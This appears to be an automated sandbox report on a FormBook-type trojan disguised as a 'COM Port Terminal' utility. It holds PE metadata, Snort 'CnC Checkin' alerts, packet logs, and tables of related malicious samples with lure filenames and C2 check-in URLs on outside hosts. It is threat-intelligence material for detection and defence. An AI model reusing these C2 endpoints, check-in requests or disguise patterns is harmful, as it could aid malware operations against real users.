Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.42.73.29, 52.182.143.212, 95.100.218.79, 20.82.209.183, 93.184.221.240, 8.247.248.249, 8.247.248.223, 8.247.244.221, 20.54.110.249, 52.251.79.25, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.49.157.6 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdeus15.eastus.cloudapp.azure.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:34:33	API Interceptor	1x Sleep call for process: 56460021473877.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
213.186.33.5	Inquiry.PDF.exe	Get hash	malicious	Browse	www.cryptoinvestyl.com/useb/?7n=rb5KM645fVULn9EIjNiSrLrXZnTqgwo0qZgPr8vcAbC+lV8HIDgfBu567M4OIFSdpGDP&CXKP2l=8p0TGj
	yutrre123.exe	Get hash	malicious	Browse	www.ip-15-235-90.net/rv9n/?C6=x2M4VzrxS8spav6&3f0Px0=FD98TgmDYK3tjsbSVN2Nn1kPM3cY7rQmBH5fe1GuppdV1PN8TumzKy7zNy0mePzpYunk
	dec.exe	Get hash	malicious	Browse	www.tapissier-uzes.com/s8ne/?9rHTW2=IywSeCxzvG/YbuYEB/7xRU7gTHZ1GMcetuZx3hUN2sl3h+qfJ8uqi3N8u2LKyEmrUvK6&lDK=Xjl0dx
	CV 10-06-2021.xlsx	Get hash	malicious	Browse	www.privatelymeeting.com/shjn/?FJB0bfcP=WC6mZM08I0NlfqwnwDG6ZhC66ih1U/GhUT+zKl6s+Bbyt2zvJc6FkKkmrbUpziPgwvGuWw==&d8r=-ZKPkTnXET
	PO#006599.pdf.exe	Get hash	malicious	Browse	www.sddebouchages.com/nid3/?j2=q+qg5ou/T18Br1UU7xG8BDYHxAIosKClNMKdAj4hUI0MbrFMjo+h1vfAQy7FTgCwKj96&f6P=_BiLl69PCpItC2
	Remittance Advice.xlsx	Get hash	malicious	Browse	www.enjoy-developpement.com/hr8n/?e2JtT=jVeTzlG8KlLhA&ufbtFP7=kc5QOVL9/kFolziHANyozIdA+E/RkrEUwpNevQ3EWN3VSWNw6VvEOavxIY6bu6qwhQYyYQ==
	BYSM-207 SC TRIFTECH78574543957Baku.exe	Get hash	malicious	Browse	www.box-770.com/ni8b/?QrNTzB=4hVp3h30&l48x5=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKkjK8OPG1pp1
	Swift Copy.exe	Get hash	malicious	Browse	www.eu-cc-scheme-isac.com/eods/?i8kt=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3&1bRLa=YfFxl
	bank statement 001.pdf.exe	Get hash	malicious	Browse	www.immobilier-alienor.net/kv3e/?r8-TmHk=MYvoXz2D7s00WneKts1QcPEMBjkRPGDQjHxDd33pXFG+ah/E7j9jeXrxmDoOt0yv/vOP&D2MxVv=LPpxnp
	rrfee1234.exe	Get hash	malicious	Browse	www.ip-15-235-90.net/rv9n/?6lu=FD98TgmDYK3tjsbSVN2Nn1kPM3cY7rQmBH5fe1GuppdV1PN8TumzKy7zNxU2RujRGLOj&r2Md=bFQLHr_XK
	Invoice Packing list.exe	Get hash	malicious	Browse	www.eu-cc-scheme-isac.com/eods/?tL30a=N8zxsVvhhbBLjNRp&6liXpZH=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3
	OApfyh3Vfm.exe	Get hash	malicious	Browse	www.privatelymeeting.com/shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3
	P.O Turkey_51021.exe	Get hash	malicious	Browse	www.badji-consulting.com/un3a/?7nH=/xgtpsrvNhmWseN6B+mMwD/3zlqwXFzD6Ke4Te1hFrO2JhIa3A3FpEDoKU5ARwPQSZkM&i6y=iVkD
	SOA.exe	Get hash	malicious	Browse	www.eu-cc-scheme-isac.com/eods/?e2M=B48tCN&0488qv=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3
	Z14S9Zolcyub1pd.exe	Get hash	malicious	Browse	www.edgar-regale.com/jdt0/?YPyd=QpNqCCk/w5C4FJ2XvGA42+trnKyHbnMin3ffX2+aSQ3Q0hQJTWPTFDZX55IzwXmDjCim&Z8atc=2dtlDXLP5h8H2Zg0
	DOC.exe	Get hash	malicious	Browse	www.hotel-balzac.paris/n58i/?RFN0Kv=04fPn6sxaFNHz&Q0DL4pLH=cltUg8I60wQSNq1POnzUEQl5YYU1bxKdSkbeF3W90ZOnJRrjtJdPokcfzu1BtUzjohcR
	USD INV#1191189.xlsx	Get hash	malicious	Browse	www.lacageavin.com/b6cu/?n6=B6rzKVNhwWBrYBudNzJT/AwPBizW8k3hcm2KU8VARUNeylPckMLclLMptxRkmVZCwNt3mQ==&xTBXUJ=6lftpVLP0d
	New Order.exe	Get hash	malicious	Browse	www.lacageavin.com/b6cu/?I6Al=wTVDQbk0M6&R48=B6rzKVNkwRBvYRiRPzJT/AwPBizW8k3hcmuaI/JBV0NfyUjajcaQzP0ruXRi+0BK87ZW/sllUQ==
	prueba22.exe	Get hash	malicious	Browse	www.bosc.pro/a0ce/?O2Mp=p3W6tZqqMh9cyJWI+Ifxtu9b3XcFtsvySVo7/NVrh1mIcTF+GwrcSSrI+V7FI7p/2Fok5w==&cT_T=9ra0stsXZtHLPLNp
	Swift Copy.exe	Get hash	malicious	Browse	www.votreconseilfinancier.com/b6cu/?2dSpM=5FGFntgWmLj4vD/wcjkbKA/XjB0p23UKe5ZDLLIhgH6ngvA+ZRqv804x9gqeYQWIj44x&PVvtW=7nWhA

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mitiendanube.com	FanCourier54488203expediere doc202177.exe	Get hash	malicious	Browse	52.200.197.31
	f41e9f9d_by_Libranalysis.exe	Get hash	malicious	Browse	52.206.238.9
	20210303948387477467,pdf.exe	Get hash	malicious	Browse	52.200.197.31
	2021_036,pdf.exe	Get hash	malicious	Browse	52.5.157.71
www.sapphiremodule.com	Peq0Amq9EP.exe	Get hash	malicious	Browse	44.227.76.166
www.box-770.com	BYSM-207 SC TRIFTECH78574543957Baku.exe	Get hash	malicious	Browse	213.186.33.5

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	SecuriteInfo.com.Exploit.Siggen3.21227.11912.xls	Get hash	malicious	Browse	188.165.62.61
	SecuriteInfo.com.Exploit.Siggen3.21227.11912.xls	Get hash	malicious	Browse	188.165.62.61
	yHm66D4wla.dll	Get hash	malicious	Browse	51.83.3.52
	FIDTIpakSU.dll	Get hash	malicious	Browse	51.83.3.52
	BobglLrEyi.dll	Get hash	malicious	Browse	51.83.3.52
	Pxnrz0DXD3.dll	Get hash	malicious	Browse	51.83.3.52
	ZHuOtLRXeM.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Artemis9D180B40D96E.25394.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.12255.xls	Get hash	malicious	Browse	188.165.62.61
	SecuriteInfo.com.ML.PE-A.4403.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.ML.PE-A.28995.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.ML.PE-A.4995.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.17985.xls	Get hash	malicious	Browse	188.165.62.61
	qDXRTsZAL9.exe	Get hash	malicious	Browse	139.99.118.252
	SecuriteInfo.com.Heur.12255.xls	Get hash	malicious	Browse	188.165.62.61
	h9WnY2tOg7.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.17985.xls	Get hash	malicious	Browse	188.165.62.61
	Payment_Receipt 7183.xls	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.21879.xls	Get hash	malicious	Browse	188.165.62.61
	EXPORT INVOICE 2021.exe	Get hash	malicious	Browse	51.161.86.13
AMAZON-AESUS	cvWFjfKtdH	Get hash	malicious	Browse	44.200.82.228
	Payment Confirmation.exe	Get hash	malicious	Browse	3.223.115.185
	Payment Information MT103.exe	Get hash	malicious	Browse	18.215.13.95
	qalTySElfj	Get hash	malicious	Browse	34.226.20.105
	rLGunciziY	Get hash	malicious	Browse	54.196.47.175
	JuufQURFPh.exe	Get hash	malicious	Browse	50.16.216.118
	ut5yFyWEDd	Get hash	malicious	Browse	44.222.19.141
	jew.x86	Get hash	malicious	Browse	54.167.221.252
	ckYh27IjHJ	Get hash	malicious	Browse	34.236.224.188
	TM2ALMOZ8Q	Get hash	malicious	Browse	18.205.154.215
	cM5cZsOugg	Get hash	malicious	Browse	54.138.164.249
	jew.x86	Get hash	malicious	Browse	35.172.163.150
	DHL-Waybill.exe	Get hash	malicious	Browse	54.208.212.1
	UaBxIF11A6	Get hash	malicious	Browse	54.82.231.227
	80wVQ9c87m	Get hash	malicious	Browse	34.238.201.118
	ubr43ro8gn	Get hash	malicious	Browse	52.3.190.129
	DQak2G9Ly5	Get hash	malicious	Browse	44.196.235.84
	x86	Get hash	malicious	Browse	54.53.174.239
	sora.x86	Get hash	malicious	Browse	44.192.229.159
	xd.arm	Get hash	malicious	Browse	52.0.161.15

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\56460021473877.exe.log Download File
Process:	C:\Users\user\Desktop\56460021473877.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.175639493174068
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	56460021473877.exe
File size:	569856
MD5:	d95e9bb2fa064a984c391b5bfc1d01e6
SHA1:	6b045974084794b785110909351e2a25950c5ed6
SHA256:	b499be4b6955eebcf4228039f67a65a38b322f0ca1d58d8071de9a428ced8720
SHA512:	8aa2c31ca9b1dc7ef64c45f8c2f56ca2d4df57d1ee05a31dc213e8ac868dbf2b520111c77b68991c6a5f4bb61def3c44a4182b7a4359501bcf892c50d19682aa
SSDEEP:	6144:t1DEMkhBBcKqMkXKQEa2F7A4quO15IWwPGQscHLHXQpCIOZBxPFPgN21c1:nD/SBBcErSqqflwPGQQpFINPgNP1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.fa..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	71f0e4d8d0e0f0f0

Static PE Info

General
Entrypoint:	0x45b9b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6166DF60 [Wed Oct 13 13:30:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b964	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x313e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x599bc	0x59a00	False	0.859723675035	data	7.73073019644	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x5c000	0x313e4	0x31400	False	0.441118734137	data	5.72292205998	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x5c200	0x9311	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x65524	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x75d5c	0x94a8	data
RT_ICON	0x7f214	0x5488	data
RT_ICON	0x846ac	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 3774873599, next used block 4294967047
RT_ICON	0x888e4	0x25a8	data
RT_ICON	0x8ae9c	0x10a8	data
RT_ICON	0x8bf54	0x988	data
RT_ICON	0x8c8ec	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x8cd64	0x84	data
RT_VERSION	0x8cdf8	0x3ea	data
RT_MANIFEST	0x8d1f4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	2.11.3.0
InternalName	CLSCompliantAttribu.exe
FileVersion	2.11.0.0
CompanyName	Jan Axelson's Lakeview Research
LegalTrademarks
Comments	Demonstrates communications between two COM ports
ProductName	COM Port Terminal
ProductVersion	2.11.0.0
FileDescription	COM Port Terminal
OriginalFilename	CLSCompliantAttribu.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-20:35:31.965433	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49811	80	192.168.2.4	154.208.173.144
10/13/21-20:35:31.965433	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49811	80	192.168.2.4	154.208.173.144
10/13/21-20:35:31.965433	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49811	80	192.168.2.4	154.208.173.144
10/13/21-20:35:42.859962	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.4	67.205.83.103
10/13/21-20:35:42.859962	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.4	67.205.83.103
10/13/21-20:35:42.859962	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.4	67.205.83.103
10/13/21-20:36:15.000572	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49851	80	192.168.2.4	31.170.167.144
10/13/21-20:36:15.000572	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49851	80	192.168.2.4	31.170.167.144
10/13/21-20:36:15.000572	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49851	80	192.168.2.4	31.170.167.144
10/13/21-20:36:31.327510	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49854	80	192.168.2.4	44.227.65.245
10/13/21-20:36:31.327510	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49854	80	192.168.2.4	44.227.65.245
10/13/21-20:36:31.327510	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49854	80	192.168.2.4	44.227.65.245

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 20:35:31.690421104 CEST	49811	80	192.168.2.4	154.208.173.144
Oct 13, 2021 20:35:31.964966059 CEST	80	49811	154.208.173.144	192.168.2.4
Oct 13, 2021 20:35:31.965118885 CEST	49811	80	192.168.2.4	154.208.173.144
Oct 13, 2021 20:35:31.965432882 CEST	49811	80	192.168.2.4	154.208.173.144
Oct 13, 2021 20:35:32.239753962 CEST	80	49811	154.208.173.144	192.168.2.4
Oct 13, 2021 20:35:32.247359991 CEST	80	49811	154.208.173.144	192.168.2.4
Oct 13, 2021 20:35:32.247539997 CEST	49811	80	192.168.2.4	154.208.173.144
Oct 13, 2021 20:35:32.247581959 CEST	49811	80	192.168.2.4	154.208.173.144
Oct 13, 2021 20:35:32.522032976 CEST	80	49811	154.208.173.144	192.168.2.4
Oct 13, 2021 20:35:37.323235989 CEST	49815	80	192.168.2.4	52.5.157.71
Oct 13, 2021 20:35:37.470927000 CEST	80	49815	52.5.157.71	192.168.2.4
Oct 13, 2021 20:35:37.474730968 CEST	49815	80	192.168.2.4	52.5.157.71
Oct 13, 2021 20:35:37.474766970 CEST	49815	80	192.168.2.4	52.5.157.71
Oct 13, 2021 20:35:37.627887964 CEST	80	49815	52.5.157.71	192.168.2.4
Oct 13, 2021 20:35:37.627907038 CEST	80	49815	52.5.157.71	192.168.2.4
Oct 13, 2021 20:35:37.628043890 CEST	49815	80	192.168.2.4	52.5.157.71
Oct 13, 2021 20:35:37.628125906 CEST	49815	80	192.168.2.4	52.5.157.71
Oct 13, 2021 20:35:37.766328096 CEST	80	49815	52.5.157.71	192.168.2.4
Oct 13, 2021 20:35:42.751701117 CEST	49817	80	192.168.2.4	67.205.83.103
Oct 13, 2021 20:35:42.859648943 CEST	80	49817	67.205.83.103	192.168.2.4
Oct 13, 2021 20:35:42.859788895 CEST	49817	80	192.168.2.4	67.205.83.103
Oct 13, 2021 20:35:42.859961987 CEST	49817	80	192.168.2.4	67.205.83.103
Oct 13, 2021 20:35:42.967464924 CEST	80	49817	67.205.83.103	192.168.2.4
Oct 13, 2021 20:35:42.967576981 CEST	80	49817	67.205.83.103	192.168.2.4
Oct 13, 2021 20:35:42.967592001 CEST	80	49817	67.205.83.103	192.168.2.4
Oct 13, 2021 20:35:42.969031096 CEST	49817	80	192.168.2.4	67.205.83.103
Oct 13, 2021 20:35:42.969053984 CEST	49817	80	192.168.2.4	67.205.83.103
Oct 13, 2021 20:35:43.076829910 CEST	80	49817	67.205.83.103	192.168.2.4
Oct 13, 2021 20:35:48.147773027 CEST	49823	80	192.168.2.4	148.72.177.185
Oct 13, 2021 20:35:48.293035984 CEST	80	49823	148.72.177.185	192.168.2.4
Oct 13, 2021 20:35:48.293538094 CEST	49823	80	192.168.2.4	148.72.177.185
Oct 13, 2021 20:35:48.294147968 CEST	49823	80	192.168.2.4	148.72.177.185
Oct 13, 2021 20:35:48.439049959 CEST	80	49823	148.72.177.185	192.168.2.4
Oct 13, 2021 20:35:48.441919088 CEST	80	49823	148.72.177.185	192.168.2.4
Oct 13, 2021 20:35:48.441946983 CEST	80	49823	148.72.177.185	192.168.2.4
Oct 13, 2021 20:35:48.442298889 CEST	49823	80	192.168.2.4	148.72.177.185
Oct 13, 2021 20:35:48.442377090 CEST	49823	80	192.168.2.4	148.72.177.185
Oct 13, 2021 20:35:58.896271944 CEST	49831	80	192.168.2.4	216.10.241.4
Oct 13, 2021 20:35:59.037774086 CEST	80	49831	216.10.241.4	192.168.2.4
Oct 13, 2021 20:35:59.037929058 CEST	49831	80	192.168.2.4	216.10.241.4
Oct 13, 2021 20:35:59.038064003 CEST	49831	80	192.168.2.4	216.10.241.4
Oct 13, 2021 20:35:59.178782940 CEST	80	49831	216.10.241.4	192.168.2.4
Oct 13, 2021 20:35:59.539577961 CEST	49831	80	192.168.2.4	216.10.241.4
Oct 13, 2021 20:35:59.721340895 CEST	80	49831	216.10.241.4	192.168.2.4
Oct 13, 2021 20:36:00.009967089 CEST	80	49831	216.10.241.4	192.168.2.4
Oct 13, 2021 20:36:00.010011911 CEST	80	49831	216.10.241.4	192.168.2.4
Oct 13, 2021 20:36:00.010154963 CEST	49831	80	192.168.2.4	216.10.241.4
Oct 13, 2021 20:36:00.010214090 CEST	49831	80	192.168.2.4	216.10.241.4
Oct 13, 2021 20:36:09.650628090 CEST	49833	80	192.168.2.4	213.186.33.5
Oct 13, 2021 20:36:09.675570011 CEST	80	49833	213.186.33.5	192.168.2.4
Oct 13, 2021 20:36:09.675734997 CEST	49833	80	192.168.2.4	213.186.33.5
Oct 13, 2021 20:36:09.675868034 CEST	49833	80	192.168.2.4	213.186.33.5
Oct 13, 2021 20:36:09.701060057 CEST	80	49833	213.186.33.5	192.168.2.4
Oct 13, 2021 20:36:09.701281071 CEST	80	49833	213.186.33.5	192.168.2.4
Oct 13, 2021 20:36:09.701363087 CEST	49833	80	192.168.2.4	213.186.33.5
Oct 13, 2021 20:36:09.701405048 CEST	49833	80	192.168.2.4	213.186.33.5
Oct 13, 2021 20:36:09.726133108 CEST	80	49833	213.186.33.5	192.168.2.4
Oct 13, 2021 20:36:14.859260082 CEST	49851	80	192.168.2.4	31.170.167.144
Oct 13, 2021 20:36:15.000027895 CEST	80	49851	31.170.167.144	192.168.2.4
Oct 13, 2021 20:36:15.000226974 CEST	49851	80	192.168.2.4	31.170.167.144
Oct 13, 2021 20:36:15.000571966 CEST	49851	80	192.168.2.4	31.170.167.144
Oct 13, 2021 20:36:15.141258001 CEST	80	49851	31.170.167.144	192.168.2.4
Oct 13, 2021 20:36:15.397768974 CEST	80	49851	31.170.167.144	192.168.2.4
Oct 13, 2021 20:36:15.398262024 CEST	80	49851	31.170.167.144	192.168.2.4
Oct 13, 2021 20:36:15.398339987 CEST	49851	80	192.168.2.4	31.170.167.144
Oct 13, 2021 20:36:15.398375034 CEST	49851	80	192.168.2.4	31.170.167.144
Oct 13, 2021 20:36:15.538866043 CEST	80	49851	31.170.167.144	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 20:35:31.118007898 CEST	52752	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:35:31.431078911 CEST	53	52752	8.8.8.8	192.168.2.4
Oct 13, 2021 20:35:37.261835098 CEST	60542	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:35:37.317528009 CEST	53	60542	8.8.8.8	192.168.2.4
Oct 13, 2021 20:35:42.638209105 CEST	60689	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:35:42.748863935 CEST	53	60689	8.8.8.8	192.168.2.4
Oct 13, 2021 20:35:48.010533094 CEST	64206	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:35:48.146205902 CEST	53	64206	8.8.8.8	192.168.2.4
Oct 13, 2021 20:35:53.450046062 CEST	50904	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:35:53.479887962 CEST	53	50904	8.8.8.8	192.168.2.4
